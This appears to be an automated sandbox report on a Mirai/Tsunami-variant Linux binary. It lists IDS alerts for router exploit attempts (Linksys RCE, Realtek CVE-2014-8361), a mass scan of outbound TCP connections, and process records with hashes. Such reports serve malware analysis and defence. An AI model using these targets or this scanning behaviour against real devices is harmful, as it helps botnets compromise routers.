              192.168.2.2395.100.151.5035616802027121 05/14/22-02:04:48.074101TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3561680192.168.2.2395.100.151.50
              192.168.2.2395.181.22.15853724802027121 05/14/22-02:04:19.574675TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5372480192.168.2.2395.181.22.158
              192.168.2.23172.65.118.4260148555552027153 05/14/22-02:04:27.953786TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6014855555192.168.2.23172.65.118.42
              192.168.2.23172.65.103.4058388555552027153 05/14/22-02:04:42.995871TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5838855555192.168.2.23172.65.103.40
              192.168.2.23156.226.14.24139102528692027339 05/14/22-02:04:47.287454TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3910252869192.168.2.23156.226.14.241
              192.168.2.23172.65.76.18357028555552027153 05/14/22-02:05:09.775735TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5702855555192.168.2.23172.65.76.183
              192.168.2.23156.250.83.8654350528692027339 05/14/22-02:05:12.575619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435052869192.168.2.23156.250.83.86
              192.168.2.2395.100.151.5035638802027121 05/14/22-02:04:49.195229TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3563880192.168.2.2395.100.151.50
              192.168.2.2395.56.213.15642384802027121 05/14/22-02:04:04.659452TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4238480192.168.2.2395.56.213.156
              192.168.2.2395.216.27.10660464802027121 05/14/22-02:04:45.496679TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6046480192.168.2.2395.216.27.106
              192.168.2.23156.226.83.13349816528692027339 05/14/22-02:05:07.440596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4981652869192.168.2.23156.226.83.133

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 14, 2022 02:03:51.299860001 CEST1309537215192.168.2.23157.52.170.169
              May 14, 2022 02:03:51.299943924 CEST1309537215192.168.2.23157.175.48.47
              May 14, 2022 02:03:51.299968958 CEST1309537215192.168.2.23157.184.91.172
              May 14, 2022 02:03:51.299969912 CEST1309537215192.168.2.23157.209.103.228
              May 14, 2022 02:03:51.300441027 CEST12519443192.168.2.2342.42.180.169
              May 14, 2022 02:03:51.300486088 CEST4431251942.42.180.169192.168.2.23
              May 14, 2022 02:03:51.300496101 CEST12519443192.168.2.2379.68.174.223
              May 14, 2022 02:03:51.300506115 CEST12519443192.168.2.2342.207.249.228
              May 14, 2022 02:03:51.300515890 CEST12519443192.168.2.2379.184.156.171
              May 14, 2022 02:03:51.300522089 CEST12519443192.168.2.23210.80.195.199
              May 14, 2022 02:03:51.300522089 CEST4431251979.68.174.223192.168.2.23
              May 14, 2022 02:03:51.300535917 CEST12519443192.168.2.2342.42.180.169
              May 14, 2022 02:03:51.300544024 CEST12519443192.168.2.2337.104.199.118
              May 14, 2022 02:03:51.300558090 CEST12519443192.168.2.2379.68.174.223
              May 14, 2022 02:03:51.300558090 CEST12519443192.168.2.2394.6.135.14
              May 14, 2022 02:03:51.300564051 CEST4431251937.104.199.118192.168.2.23
              May 14, 2022 02:03:51.300575018 CEST12519443192.168.2.2394.251.209.196
              May 14, 2022 02:03:51.300582886 CEST12519443192.168.2.2379.148.171.195
              May 14, 2022 02:03:51.300591946 CEST12519443192.168.2.23210.6.9.223
              May 14, 2022 02:03:51.300592899 CEST4431251994.6.135.14192.168.2.23
              May 14, 2022 02:03:51.300595999 CEST4431251979.148.171.195192.168.2.23
              May 14, 2022 02:03:51.300597906 CEST12519443192.168.2.2337.104.199.118
              May 14, 2022 02:03:51.300607920 CEST12519443192.168.2.23178.113.142.204
              May 14, 2022 02:03:51.300611019 CEST12519443192.168.2.235.118.83.191
              May 14, 2022 02:03:51.300616980 CEST44312519178.113.142.204192.168.2.23
              May 14, 2022 02:03:51.300620079 CEST4431251994.251.209.196192.168.2.23
              May 14, 2022 02:03:51.300620079 CEST44312519210.6.9.223192.168.2.23
              May 14, 2022 02:03:51.300622940 CEST12519443192.168.2.2379.148.171.195
              May 14, 2022 02:03:51.300638914 CEST443125195.118.83.191192.168.2.23
              May 14, 2022 02:03:51.300641060 CEST12519443192.168.2.2394.6.135.14
              May 14, 2022 02:03:51.300645113 CEST12519443192.168.2.23178.113.142.204
              May 14, 2022 02:03:51.300654888 CEST12519443192.168.2.2394.251.209.196
              May 14, 2022 02:03:51.300657988 CEST12519443192.168.2.2337.103.19.147
              May 14, 2022 02:03:51.300667048 CEST12519443192.168.2.235.118.83.191
              May 14, 2022 02:03:51.300668001 CEST4431251937.103.19.147192.168.2.23
              May 14, 2022 02:03:51.300677061 CEST12519443192.168.2.23210.6.9.223
              May 14, 2022 02:03:51.300687075 CEST12519443192.168.2.23178.242.11.116
              May 14, 2022 02:03:51.300688982 CEST12519443192.168.2.232.158.81.31
              May 14, 2022 02:03:51.300702095 CEST12519443192.168.2.2337.103.19.147
              May 14, 2022 02:03:51.300702095 CEST44312519178.242.11.116192.168.2.23
              May 14, 2022 02:03:51.300704956 CEST443125192.158.81.31192.168.2.23
              May 14, 2022 02:03:51.300705910 CEST12519443192.168.2.23118.22.176.1
              May 14, 2022 02:03:51.300710917 CEST12519443192.168.2.232.100.87.168
              May 14, 2022 02:03:51.300712109 CEST12519443192.168.2.2379.95.245.27
              May 14, 2022 02:03:51.300714970 CEST44312519118.22.176.1192.168.2.23
              May 14, 2022 02:03:51.300720930 CEST4431251979.95.245.27192.168.2.23
              May 14, 2022 02:03:51.300723076 CEST443125192.100.87.168192.168.2.23
              May 14, 2022 02:03:51.300724030 CEST12519443192.168.2.2379.101.9.186
              May 14, 2022 02:03:51.300740004 CEST4431251979.101.9.186192.168.2.23
              May 14, 2022 02:03:51.300745964 CEST12519443192.168.2.232.9.173.251
              May 14, 2022 02:03:51.300750017 CEST12519443192.168.2.23178.242.11.116
              May 14, 2022 02:03:51.300753117 CEST443125192.9.173.251192.168.2.23
              May 14, 2022 02:03:51.300755024 CEST12519443192.168.2.232.158.81.31
              May 14, 2022 02:03:51.300759077 CEST12519443192.168.2.23118.23.238.64
              May 14, 2022 02:03:51.300765991 CEST44312519118.23.238.64192.168.2.23
              May 14, 2022 02:03:51.300766945 CEST12519443192.168.2.23118.22.176.1
              May 14, 2022 02:03:51.300776005 CEST12519443192.168.2.232.9.173.251
              May 14, 2022 02:03:51.300776005 CEST12519443192.168.2.232.100.87.168
              May 14, 2022 02:03:51.300777912 CEST12519443192.168.2.2379.95.245.27
              May 14, 2022 02:03:51.300781965 CEST12519443192.168.2.2379.101.9.186
              May 14, 2022 02:03:51.300791025 CEST12519443192.168.2.23118.23.238.64
              May 14, 2022 02:03:51.300798893 CEST12519443192.168.2.2342.254.10.127
              May 14, 2022 02:03:51.300808907 CEST4431251942.254.10.127192.168.2.23
              May 14, 2022 02:03:51.300815105 CEST12519443192.168.2.2394.208.123.42
              May 14, 2022 02:03:51.300817966 CEST12519443192.168.2.2394.230.101.2
              May 14, 2022 02:03:51.300821066 CEST4431251994.208.123.42192.168.2.23
              May 14, 2022 02:03:51.300833941 CEST4431251994.230.101.2192.168.2.23
              May 14, 2022 02:03:51.300992012 CEST12519443192.168.2.2379.61.227.96
              May 14, 2022 02:03:51.300997019 CEST12519443192.168.2.235.33.184.248
              May 14, 2022 02:03:51.300997972 CEST1251152869192.168.2.23156.235.181.169
              May 14, 2022 02:03:51.300998926 CEST12519443192.168.2.2394.208.123.42
              May 14, 2022 02:03:51.301001072 CEST12519443192.168.2.23212.69.2.6
              May 14, 2022 02:03:51.301002979 CEST12519443192.168.2.23210.112.147.30
              May 14, 2022 02:03:51.301002979 CEST12519443192.168.2.2394.170.37.58
              May 14, 2022 02:03:51.301003933 CEST4431251979.61.227.96192.168.2.23
              May 14, 2022 02:03:51.301007986 CEST12519443192.168.2.23109.26.55.32
              May 14, 2022 02:03:51.301013947 CEST12519443192.168.2.23109.165.133.222
              May 14, 2022 02:03:51.301017046 CEST4431251994.170.37.58192.168.2.23
              May 14, 2022 02:03:51.301016092 CEST443125195.33.184.248192.168.2.23
              May 14, 2022 02:03:51.301018953 CEST44312519210.112.147.30192.168.2.23
              May 14, 2022 02:03:51.301022053 CEST44312519109.26.55.32192.168.2.23
              May 14, 2022 02:03:51.301023006 CEST44312519109.165.133.222192.168.2.23
              May 14, 2022 02:03:51.301023960 CEST12519443192.168.2.2337.90.187.167
              May 14, 2022 02:03:51.301024914 CEST12519443192.168.2.2394.182.27.4
              May 14, 2022 02:03:51.301024914 CEST12519443192.168.2.2342.186.245.124
              May 14, 2022 02:03:51.301028013 CEST44312519212.69.2.6192.168.2.23
              May 14, 2022 02:03:51.301031113 CEST12519443192.168.2.235.79.186.59
              May 14, 2022 02:03:51.301032066 CEST4431251937.90.187.167192.168.2.23
              May 14, 2022 02:03:51.301033020 CEST12519443192.168.2.2394.40.157.89
              May 14, 2022 02:03:51.301033020 CEST12519443192.168.2.2342.64.158.20
              May 14, 2022 02:03:51.301035881 CEST12519443192.168.2.2394.230.101.2
              May 14, 2022 02:03:51.301037073 CEST4431251994.182.27.4192.168.2.23
              May 14, 2022 02:03:51.301038027 CEST4431251942.186.245.124192.168.2.23
              May 14, 2022 02:03:51.301038980 CEST12519443192.168.2.2394.45.3.135
              May 14, 2022 02:03:51.301039934 CEST443125195.79.186.59192.168.2.23
              May 14, 2022 02:03:51.301040888 CEST12519443192.168.2.23212.216.128.133
              May 14, 2022 02:03:51.301042080 CEST12519443192.168.2.23210.118.35.229
              May 14, 2022 02:03:51.301042080 CEST12519443192.168.2.23210.42.79.36
              May 14, 2022 02:03:51.301043987 CEST12519443192.168.2.23212.250.180.160
              May 14, 2022 02:03:51.301043987 CEST4431251994.40.157.89192.168.2.23

              HTTP Request Dependency Graph

              • 127.0.0.1:80
              • 192.168.0.14:80

              System Behavior

              General

              Start time:02:03:49
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:/tmp/VC3SWrkssz
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:03:50
              Start date:14/05/2022
              Path:/tmp/VC3SWrkssz
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:02:05:08
              Start date:14/05/2022
              Path:/usr/libexec/gnome-session-binary
              Arguments:n/a
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              General

              Start time:02:05:08
              Start date:14/05/2022
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:02:05:08
              Start date:14/05/2022
              Path:/usr/libexec/gsd-print-notifications
              Arguments:/usr/libexec/gsd-print-notifications
              File size:51840 bytes
              MD5 hash:71539698aa691718cee775d6b9450ae2

              General

              Start time:02:05:09
              Start date:14/05/2022
              Path:/usr/libexec/gsd-print-notifications
              Arguments:n/a
              File size:51840 bytes
              MD5 hash:71539698aa691718cee775d6b9450ae2

              General

              Start time:02:05:09
              Start date:14/05/2022
              Path:/usr/libexec/gsd-print-notifications
              Arguments:n/a
              File size:51840 bytes
              MD5 hash:71539698aa691718cee775d6b9450ae2

              General

              Start time:02:05:09
              Start date:14/05/2022
              Path:/usr/libexec/gsd-printer
              Arguments:/usr/libexec/gsd-printer
              File size:31120 bytes
              MD5 hash:7995828cf98c315fd55f2ffb3b22384d

              General

              Start time:02:05:41
              Start date:14/05/2022
              Path:/usr/bin/xfce4-session
              Arguments:n/a
              File size:264752 bytes
              MD5 hash:648919f03ad356720c8c27f5aaaf75d1

              General

              Start time:02:05:41
              Start date:14/05/2022
              Path:/usr/bin/rm
              Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b